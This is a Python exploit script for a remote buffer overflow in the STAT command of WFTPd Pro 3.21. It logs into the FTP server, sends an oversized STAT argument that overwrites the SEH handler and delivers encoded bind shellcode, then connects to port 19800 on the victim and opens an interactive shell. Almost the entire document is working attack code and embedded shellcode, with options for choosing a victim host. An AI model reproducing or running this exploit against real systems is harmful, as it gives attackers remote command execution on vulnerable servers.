WFTPd STAT Command Remote Vulnerability Exploit
#!/usr/bin/python
#wftpd exploit, code by OYXin
#POC and lame python exploit, only test on WFTD pro 3.21.1.1 with win2000 cn sp4
#vul found by axl rose <rdxaxl hotmail com>
#Thanks ax1 and all 0seen team members.
#Night gave me the eye of black
#with it I pursue after the light
import socket
import getopt
import sys
import string
import telnetlib
import time
fakeseh = '\x71\x15\xfa\x7f'
jmpover = '\xeb\x06\xeb\x06'
#ripped from jeno
#http://www.xfocus.net/articles/200308/604.html
bindsc = ""
bindsc += "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\xd9\x01\x80\x34\x0B\x99\xE2\xFA"
bindsc += "\xEB\x05\xE8\xEB\xFF\xFF\xFF\x18\x75\x19\x99\x99\x99\x12\x6D\x71"
bindsc += "\xD5\x98\x99\x99\x10\x9F\x66\xAF\xF1\x17\xD7\x97\x75\x71\xFF\x98"
bindsc += "\x99\x99\x10\xDF\x91\x66\xAF\xF1\x34\x40\x9C\x57\x71\xCE\x98\x99"
bindsc += "\x99\x10\xDF\x95\xF1\xF5\xF5\x99\x99\xF1\xAA\xAB\xB7\xFD\xF1\xEE"
bindsc += "\xEA\xAB\xC6\xCD\x66\xCF\x91\x10\xDF\x9D\x66\xAF\xF1\xEB\x67\x2A"
bindsc += "\x8F\x71\xAB\x98\x99\x99\x10\xDF\x89\x66\xAF\xF1\xE7\x41\x7B\xEA"
bindsc += "\x71\xBA\x98\x99\x99\x10\xDF\x8D\x66\xEF\x9D\xF1\x52\x74\x65\xA2"
bindsc += "\x71\x8A\x98\x99\x99\x10\xDF\x81\x66\xEF\x9D\xF1\x40\x90\x6C\x34"
bindsc += "\x71\x9A\x98\x99\x99\x10\xDF\x85\x66\xEF\x9D\xF1\x3D\x83\xE9\x5E"
bindsc += "\x71\x6A\x99\x99\x99\x10\xDF\xB9\x66\xEF\x9D\xF1\x3D\x34\xB7\x70"
bindsc += "\x71\x7A\x99\x99\x99\x10\xDF\xBD\x66\xEF\x9D\xF1\x7C\xD0\x1F\xD0"
bindsc += "\x71\x4A\x99\x99\x99\x10\xDF\xB1\x66\xEF\x9D\xF1\x7E\xE0\x5F\xE0"
bindsc += "\x71\x5A\x99\x99\x99\x10\xDF\xB5\xAA\x66\x18\x75\x09\x98\x99\x99"
bindsc += "\xCD\xF1\x98\x98\x99\x99\x66\xCF\x81\xC9\xC9\xC9\xC9\xD9\xC9\xD9"
bindsc += "\xC9\x66\xCF\x85\x12\x41\xCE\xCE\xF1\x9B\x99\xd4\xc1\x12\x55\xF3"
bindsc += "\x8F\xC8\xCA\x66\xCF\xB9\xCE\xCA\x66\xCF\xBD\xCE\xC8\xCA\x66\xCF"
bindsc += "\xB1\x12\x49\xF1\xFC\xE1\xFC\x99\xF1\xFA\xF4\xFD\xB7\x10\xFF\xA9"
bindsc += "\x1A\x75\xCD\x14\xA5\xBD\xAA\x59\xAA\x50\x1A\x58\x8C\x32\x7B\x64"
bindsc += "\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA5\x67\xDD\xBD\xA4\x10\xCD\xBD"
bindsc += "\xD1\x10\xCD\xBD\xD5\x10\xCD\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8"
bindsc += "\xC8\xC8\xD8\xC8\xD0\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x89\x12\x55"
bindsc += "\xF3\x66\x66\xA8\x66\xCF\x95\x12\x51\xCE\x66\xCF\xB5\x66\xCF\x8D"
bindsc += "\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12\xD9\x95\x12"
bindsc += "\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31\x21\x99\x99"
bindsc += "\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81"
bindsc += "\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12\xC3\xB9\x9A"
bindsc += "\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA\x59\x35\xA3"
bindsc += "\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78"
bindsc += "\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
bindsc += "\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2\x5B\x9D\x99"
class wftpd_exploit:
def __init__(self):
self.host = 'localhost'
self.port = '21'
self.username = 'anonymous'
self.password = 'oyxin@21cn.com'
self.exploitstring = ""
self.recvbuf = ''
return
def usage():
print 'wftpexploit -h ip -p port -U usernmae -p password'
def sethost(self,host):
self.host = host
return
def setport(self,port):
self.port = port
return
def setname(self,username):
self.username = username
return
def setpass(self,password):
self.password = password
return
def makestring(self):
self.exploitstring = 'STAT -'+ 'A'*35 + jmpover + fakeseh + bindsc + ' ' + '\r\n'
return
def run(self):
try:
sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockfd.connect((self.host, int(self.port)))
recvbuf = sockfd.recv(1000)
print '[+] '+'send username'
sockfd.send('user '+self.username+'\r\n')
recvbuf = sockfd.recv(1000)
print '[-] '+string.strip(recvbuf)
print '[+] '+'send password'
sockfd.send('pass '+self.password+'\r\n')
recvbuf = sockfd.recv(1000)
print '[-] '+string.strip(recvbuf)
print '[+] '+'send evilbuf.....'
sockfd.send(self.exploitstring)
recvbuf = sockfd.recv(1000)
sockfd.close()
except:
sys.exit(-1)
def getshell(self):
print 'Try to get shell...waiting\n'
time.sleep(1)
try:
sockfd2=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sockfd2.connect((self.host,19800))
shell=telnetlib.Telnet()
shell.sock=sockfd2
shell.interact()
except:
print "sorry,maybe you can try connect back.....\n"
sys.exit(-1)
if __name__ == '__main__':
oseen = wftpd_exploit()
victimname = 'anonymous'
victimpass = 'oyxin@21cn.com'
victimport = 21
try:
(opts,args)=getopt.getopt(sys.argv[1:],"h:p:U:P:")
except getopt.GetoptError:
oseen.usage()
for o,a in opts:
if o in ["-h"]:
victimhost = a
if o in ["-p"]:
victimport = a
if o in ["-U"]:
victimname = a
if o in ["-P"]:
victimpass = a
oseen.sethost( victimhost )
oseen.setport( victimport )
oseen.setname( victimname )
oseen.setpass( victimpass )
oseen.makestring()
oseen.run()
oseen.getshell()